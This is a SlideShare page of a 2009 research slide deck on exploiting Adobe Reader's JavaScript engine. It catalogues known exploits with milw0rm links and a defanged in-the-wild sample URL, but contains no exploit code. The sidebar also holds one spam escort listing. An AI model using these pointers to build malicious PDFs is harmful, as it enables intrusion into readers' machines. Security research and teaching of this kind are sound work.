SlideShare una empresa de Scribd logo

Leveraging Adobe JavaScript Virtual Machine

Z Chen
Z Chen
Tecnología
1 de 22
Descargar para leer sin conexión
Adobe JS Z Chen About Adobe Javascript Exploits . . Overview Leveraging Adobe JavaScript Virtual Machine Try It Out! . .. . . Samples In the Wild Zhijie Chen1 1 Engeineering Research Center of Information Security,ICST,PKU May 15, 2009 JoYAN . . . . . .
Contents Adobe JS Z Chen About Adobe Javascript . Exploits . . About Adobe Javascript 1 Overview Try It Out! . Samples In the Wild . . Exploits Overview 2 . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 2
Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 3
What can it do? Adobe JS Z Chen . Adobe Javascript . About Adobe .. Javascript Adobe JavaScripts can be created for batch processing of multi- Exploits ple documents, processing within a single document, processing Overview for a given page, and processing for a single form field... Try It Out! Samples In the Customize the behavior of a particular PDF document. Wild Customize Acrobat itself. Implement security policies. Interact with databases and web services. Dynamically alter the appearance of a PDF document Capture user-entered data from form fields. Submit those data through SOAP-based Web Services. . Surpport for online team review. .. . JoYAN . 4
Adobe JS Objects Adobe JS Z Chen . Acrobat JavaScript defines several objects that allow your code. About Adobe Javascript to interact with Acrobat, a PDF document, or form fields within Exploits a . PDF document. .. . . Overview Try It Out! . Object Purpose Object Purpose . Samples In the Wild app Acrobat doc PDF document dbg JavaScript debugger console JavaScript console global Persistent and cross- util JavaScript utility document information methods dialog Adobe Dialog Man- security Encryption and digital ager (ADM) signatures SOAP Web Services search Searching and index- ing ADBC Database connections event JavaScript events and queries . JoYAN .. . . 5
Adobe JS Z Chen About Adobe Javascript Exploits Overview . Tools I use for manipulating pdf files . Try It Out! .. Samples In the pdftk: PDF toolkit. “If PDF is electronic paper, then pdftk Wild is an electronic staple-remover, hole-punch, binder, secret- decoder-ring, and X-Ray-glasses. ” . Scribus: Open Source Desktop Publishing. .. . . JoYAN 6
Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 7
Adobe PDF Exploit List Adobe JS Z Chen . Exlpoits List from Milw0rm . About Adobe Javascript .. Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Ex- Exploits Overview ploit Try It Out! Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit Samples In the Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit Wild Adobe Acrobat Reader JBIG2 Universal Exploit Bind Shell port 5500 Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit Adobe Acrobat 9 ActiveX Remote Denial of Service Exploit Adobe Acrobat Reader <= 8.1.2 Malformed PDF Remote DOS PoC Adobe Reader plug-in AcroPDF.dll 8.0.0.0 Resource Consumption Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vulnerability . Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service .. . . JoYAN 8
Leveragine Type I Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Play with the bugs when invoking a built-in function/method Wild within the Javascript context. Easy to trigger and exploit. JoYAN 9
Adobe 8.1.4/9.1 customDictionaryOpen() Code Execution Exploit Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild http://milw0rm.com/exploits/8570 JoYAN 10
Adobe Reader 8.1.4/9.1 GetAnnots() Remote Code Execution Exploit Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild http://milw0rm.com/exploits/8569 Not a stack overflow? JoYAN 11
Adobe Reader util.printf() JavaScript Function Stack Overflow Exploit Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild http://milw0rm.com/exploits/7006 http://milw0rm.com/exploits/6994 JoYAN 12
Adobe Acrobat Reader 8.1.2 – 9.0 getIcon() Memory Corruption Exploit Adobe JS Z Chen . http://milw0rm.com/exploits/8595 . About Adobe .. Javascript Affected Version : Acrobat Reader 8.1.2 - 9.0 Exploits Overview Tested On : XP SP2 / SP3 Try It Out! Description : This vulnerability allows remote attackers to Samples In the Wild execute arbitrary code on vulnerable installations of Adobe Acrobat and Adobe Reader. User interaction is required in that a user must visit a malicious web site or open a mali- cious file.The specific flaw exists when processing malicious JavaScript contained in a PDF document. When supply- ing a specially crafted argument to the getIcon() method of a Collab object, proper bounds checking is not performed resulting in a stack overflow. . Failed to uncompress it :(. .. . JoYAN . 13
Leveragine Type II Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the Wild Play with the bugs when parsering a malformed pdf file. Only use the javascript to perform a heapspray. JoYAN 14
Adobe Acrobat Reader JBIG2 Local Buffer Overflow Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! Samples In the http://vrt-sourcefire.blogspot.com/2009/02/have-nice-weekend-pdf-love.h Wild http://milw0rm.com/exploits/8099 http://milw0rm.com/exploits/8280 JoYAN 15
Leveragine Type III Adobe JS Z Chen . About Adobe Play with the urls. . Javascript Exploits I don’t know whether it works in the browser context or pdf reader Overview context.. Try It Out! Samples In the Adobe PDF Reader plug-in AcroPDF.dll ver. 8.0.0.0 Resource Wild Consumption:http://milw0rm.com/exploits/3430 Adobe Acrobat Reader Plugin <= 7.0.x (acroreader) XSS Vul- nerability:http://milw0rm.com/exploits/3084 Adobe Reader 7.0.8.0 AcroPDF.dll Internet Explorer Denial of Service:http://milw0rm.com/exploits/3040 Adobe Acrobat 9 ActiveX Remote Denial of Service Ex- . ploit:http://milw0rm.com/exploits/6424 .. . . JoYAN 16
To be continued... Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! . Those I can’t RE them: . Samples In the .. Wild . .. 1 Adobe Acrobat Reader <= 8.1.2 Reader Remote Denial Of . Service:http://milw0rm.com/exploits/5687, Overflow? .. . . JoYAN 17
Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 18
Try it out! Adobe JS Z Chen About Adobe Javascript Exploits Overview . Try It Out! Adobe Reader util.printf() JavaScript Function Stack Over-. Samples In the Wild flow Exploit .. http://milw0rm.com/exploits/7006 . http://milw0rm.com/exploits/6994 .. . . JoYAN 19
Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 20
Sample in the wild Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! . Samples In the 50.2 . Wild .. hxxp://172.31.25.229/acroPDF.htm . .. . . JoYAN 21
Adobe JS Z Chen About Adobe Javascript Exploits Overview Try It Out! . Samples In the Wild .. Thank you ! . .. . . JoYAN 22

Recomendados

Location and role centric right management
Location and role centric right managementLocation and role centric right management
Location and role centric right managementPatrick Ostertag
 
Rascal Devnology Code Fest
Rascal Devnology Code FestRascal Devnology Code Fest
Rascal Devnology Code FestDevnology
 
A Brief Overview of Virtualization
A Brief Overview of VirtualizationA Brief Overview of Virtualization
A Brief Overview of VirtualizationZ Chen
 
Adobe Flash Player Invalid Pointer Vulnerability
Adobe Flash Player Invalid Pointer VulnerabilityAdobe Flash Player Invalid Pointer Vulnerability
Adobe Flash Player Invalid Pointer VulnerabilityZ Chen
 
MgnlKickstart - Develop Magnolia Websites Faster, Better And Easier
MgnlKickstart - Develop Magnolia Websites Faster, Better And EasierMgnlKickstart - Develop Magnolia Websites Faster, Better And Easier
MgnlKickstart - Develop Magnolia Websites Faster, Better And EasierVivian Steller
 
Ruth Catlow
Ruth CatlowRuth Catlow
Ruth CatlowWAAE
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycZ Chen
 
Sistema Nervioso
Sistema NerviosoSistema Nervioso
Sistema NerviosoAle Jimenez Gomez
 

Recomendados

Location and role centric right management
Location and role centric right managementLocation and role centric right management
Location and role centric right managementPatrick Ostertag
 
Rascal Devnology Code Fest
Rascal Devnology Code FestRascal Devnology Code Fest
Rascal Devnology Code FestDevnology
 
A Brief Overview of Virtualization
A Brief Overview of VirtualizationA Brief Overview of Virtualization
A Brief Overview of VirtualizationZ Chen
 
Adobe Flash Player Invalid Pointer Vulnerability
Adobe Flash Player Invalid Pointer VulnerabilityAdobe Flash Player Invalid Pointer Vulnerability
Adobe Flash Player Invalid Pointer VulnerabilityZ Chen
 
MgnlKickstart - Develop Magnolia Websites Faster, Better And Easier
MgnlKickstart - Develop Magnolia Websites Faster, Better And EasierMgnlKickstart - Develop Magnolia Websites Faster, Better And Easier
MgnlKickstart - Develop Magnolia Websites Faster, Better And EasierVivian Steller
 
Ruth Catlow
Ruth CatlowRuth Catlow
Ruth CatlowWAAE
 
Shellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycShellcode and heapspray detection in phoneyc
Shellcode and heapspray detection in phoneycZ Chen
 
Sistema Nervioso
Sistema NerviosoSistema Nervioso
Sistema NerviosoAle Jimenez Gomez
 
Your java script library
Your java script libraryYour java script library
Your java script libraryjasfog
 
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...Hafez Kamal
 
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDavid Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDay Software
 
What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.David Nuescheler
 
Node.JS briefly introduced
Node.JS briefly introducedNode.JS briefly introduced
Node.JS briefly introducedAlexandre Lachèze
 
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSFred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSAxway Appcelerator
 
RIA
RIARIA
RIAMahesh Panchal
 
Great Cup od Java
Great Cup od JavaGreat Cup od Java
Great Cup od JavaCIB Egypt
 
Metaprogramming JavaScript
Metaprogramming JavaScriptMetaprogramming JavaScript
Metaprogramming JavaScriptdanwrong
 
Agile JavaScript Testing
Agile JavaScript TestingAgile JavaScript Testing
Agile JavaScript TestingScott Becker
 
Evolving web, evolving search
Evolving web, evolving searchEvolving web, evolving search
Evolving web, evolving searchnet2-project
 
State Of Ajax Zend Con 08
State Of Ajax Zend Con 08State Of Ajax Zend Con 08
State Of Ajax Zend Con 08bgalbs
 
MongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataMongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataChris Richardson
 
Creative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkCreative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkHuijie Wu
 
Jopenmeraverse introduction
Jopenmeraverse introductionJopenmeraverse introduction
Jopenmeraverse introductionJitendra Chauhan
 
Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Leonardo Soto
 
Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?André Goliath
 
Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Giacomo Bergami
 
仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要かKohei Otsuka
 
2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertagMarcel Bruch
 
The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 

Más contenido relacionado

Similar a Leveraging Adobe JavaScript Virtual Machine

Your java script library
Your java script libraryYour java script library
Your java script libraryjasfog
 
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...Hafez Kamal
 
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDavid Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDay Software
 
What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.David Nuescheler
 
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSFred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSAxway Appcelerator
 
Great Cup od Java
Great Cup od JavaGreat Cup od Java
Great Cup od JavaCIB Egypt
 
Metaprogramming JavaScript
Metaprogramming JavaScriptMetaprogramming JavaScript
Metaprogramming JavaScriptdanwrong
 
Agile JavaScript Testing
Agile JavaScript TestingAgile JavaScript Testing
Agile JavaScript TestingScott Becker
 
Evolving web, evolving search
Evolving web, evolving searchEvolving web, evolving search
Evolving web, evolving searchnet2-project
 
State Of Ajax Zend Con 08
State Of Ajax Zend Con 08State Of Ajax Zend Con 08
State Of Ajax Zend Con 08bgalbs
 
MongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataMongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataChris Richardson
 
Creative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkCreative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkHuijie Wu
 
Jopenmeraverse introduction
Jopenmeraverse introductionJopenmeraverse introduction
Jopenmeraverse introductionJitendra Chauhan
 
Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Leonardo Soto
 
Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?André Goliath
 
Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Giacomo Bergami
 
仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要かKohei Otsuka
 
2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertagMarcel Bruch
 

Similar a Leveraging Adobe JavaScript Virtual Machine (20)

Your java script library
Your java script libraryYour java script library
Your java script library
 
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
NanoSec Conference 2019: Code Execution Analysis in Mobile Apps - Abdullah Jo...
 
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and RoadmapDavid Nuescheler: Igniting CQ 5.3: What's New and Roadmap
David Nuescheler: Igniting CQ 5.3: What's New and Roadmap
 
What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.What's new in CQ 5.3? Top 10 features.
What's new in CQ 5.3? Top 10 features.
 
Node.JS briefly introduced
Node.JS briefly introducedNode.JS briefly introduced
Node.JS briefly introduced
 
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOSFred Spencer & Blain Hamon: Advanced Titanium for iOS
Fred Spencer & Blain Hamon: Advanced Titanium for iOS
 
RIA
RIARIA
RIA
 
Great Cup od Java
Great Cup od JavaGreat Cup od Java
Great Cup od Java
 
Metaprogramming JavaScript
Metaprogramming JavaScriptMetaprogramming JavaScript
Metaprogramming JavaScript
 
Agile JavaScript Testing
Agile JavaScript TestingAgile JavaScript Testing
Agile JavaScript Testing
 
Evolving web, evolving search
Evolving web, evolving searchEvolving web, evolving search
Evolving web, evolving search
 
State Of Ajax Zend Con 08
State Of Ajax Zend Con 08State Of Ajax Zend Con 08
State Of Ajax Zend Con 08
 
MongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring DataMongoDB for Java Developers with Spring Data
MongoDB for Java Developers with Spring Data
 
Creative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling FrameworkCreative Coders March 2013 - Introducing Starling Framework
Creative Coders March 2013 - Introducing Starling Framework
 
Jopenmeraverse introduction
Jopenmeraverse introductionJopenmeraverse introduction
Jopenmeraverse introduction
 
Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)Django On Jython (for Portland and Boulder Python user groups presentations)
Django On Jython (for Portland and Boulder Python user groups presentations)
 
Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?Javaland 2017: "You´ll do microservices now". Now what?
Javaland 2017: "You´ll do microservices now". Now what?
 
Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)Android Internals (This is not the droid you’re loking for...)
Android Internals (This is not the droid you’re loking for...)
 
仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か仕様決定、部品化、ディレクションがなぜ重要か
仕様決定、部品化、ディレクションがなぜ重要か
 
2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag2010 06-24 karlsruher entwicklertag
2010 06-24 karlsruher entwicklertag
 

Último

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024Rafal Los
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherRemote DBA Services
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)Gabriella Davis
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slidevu2urc
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationRadu Cotescu
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Scriptwesley chun
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?Antenna Manufacturer Coco
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfEnterprise Knowledge
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsJoaquim Jorge
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfhans926745
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024The Digital Insurer
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdfChristopherTHyatt
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Igalia
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdfhans926745
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking MenDelhi Call girls
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationSafe Software
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsMaria Levchenko
 

Último (20)

The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024The 7 Things I Know About Cyber Security After 25 Years | April 2024
The 7 Things I Know About Cyber Security After 25 Years | April 2024
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
Strategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a FresherStrategies for Landing an Oracle DBA Job as a Fresher
Strategies for Landing an Oracle DBA Job as a Fresher
 
A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)A Domino Admins Adventures (Engage 2024)
A Domino Admins Adventures (Engage 2024)
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Scaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organizationScaling API-first – The story of a global engineering organization
Scaling API-first – The story of a global engineering organization
 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day Presentation
 
Automating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps ScriptAutomating Google Workspace (GWS) & more with Apps Script
Automating Google Workspace (GWS) & more with Apps Script
 
What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?What Are The Drone Anti-jamming Systems Technology?
What Are The Drone Anti-jamming Systems Technology?
 
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdfThe Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
The Role of Taxonomy and Ontology in Semantic Layers - Heather Hedden.pdf
 
Artificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and MythsArtificial Intelligence: Facts and Myths
Artificial Intelligence: Facts and Myths
 
Tech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdfTech Trends Report 2024 Future Today Institute.pdf
Tech Trends Report 2024 Future Today Institute.pdf
 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
 
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
Bajaj Allianz Life Insurance Company - Insurer Innovation Award 2024
 
Evaluating the top large language models.pdf
Evaluating the top large language models.pdfEvaluating the top large language models.pdf
Evaluating the top large language models.pdf
 
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
Raspberry Pi 5: Challenges and Solutions in Bringing up an OpenGL/Vulkan Driv...
 
[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf[2024]Digital Global Overview Report 2024 Meltwater.pdf
[2024]Digital Global Overview Report 2024 Meltwater.pdf
 
08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men08448380779 Call Girls In Civil Lines Women Seeking Men
08448380779 Call Girls In Civil Lines Women Seeking Men
 
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time AutomationFrom Event to Action: Accelerate Your Decision Making with Real-Time Automation
From Event to Action: Accelerate Your Decision Making with Real-Time Automation
 
Handwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed textsHandwritten Text Recognition for manuscripts and early printed texts
Handwritten Text Recognition for manuscripts and early printed texts
 

Leveraging Adobe JavaScript Virtual Machine

  • 1. Adobe JS Z Chen About Adobe Javascript Exploits . . Overview Leveraging Adobe JavaScript Virtual Machine Try It Out! . .. . . Samples In the Wild Zhijie Chen1 1 Engeineering Research Center of Information Security,ICST,PKU May 15, 2009 JoYAN . . . . . .
  • 2. Contents Adobe JS Z Chen About Adobe Javascript . Exploits . . About Adobe Javascript 1 Overview Try It Out! . Samples In the Wild . . Exploits Overview 2 . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 2
  • 3. Contents Adobe JS Z Chen . About Adobe Javascript . . About Adobe Javascript 1 Exploits Overview Try It Out! . Samples In the . . Exploits Overview 2 Wild . . . Try It Out! 3 . . . Samples In the Wild 4 JoYAN 3
  • 4. What can it do? Adobe JS Z Chen . Adobe Javascript . About Adobe .. Javascript Adobe JavaScripts can be created for batch processing of multi- Exploits ple documents, processing within a single document, processing Overview for a given page, and processing for a single form field... Try It Out! Samples In the Customize the behavior of a particular PDF document. Wild Customize Acrobat itself. Implement security policies. Interact with databases and web services. Dynamically alter the appearance of a PDF document Capture user-entered data from form fields. Submit those data through SOAP-based Web Services. . Surpport for online team review. .. . JoYAN . 4
  • 5. Adobe JS Objects Adobe JS Z Chen . Acrobat JavaScript defines several objects that allow your code. About Adobe Javascript to interact with Acrobat, a PDF document, or form fields within Exploits a . PDF document. .. . . Overview Try It Out! . Object Purpose Object Purpose . Samples In the Wild app Acrobat doc PDF document dbg JavaScript debugger console JavaScript console global Persistent and cross- util JavaScript utility document information methods dialog Adobe Dialog Man- security Encryption and digital ager (ADM) signatures SOAP Web Services search Searching and index- ing ADBC Database connections event JavaScript events and queries . JoYAN .. . . 5
  • 6. Adobe JS Z Chen About Adobe Javascript Exploits Overview . Tools I use for manipulating pdf files . Try It Out! .. Samples In the pdftk: PDF toolkit. “If PDF is electronic paper, then pdftk Wild is an electronic staple-remover, hole-punch, binder, secret- decoder-ring, and X-Ray-glasses. ” . Scribus: Open Source Desktop Publishing. .. . . JoYAN 6
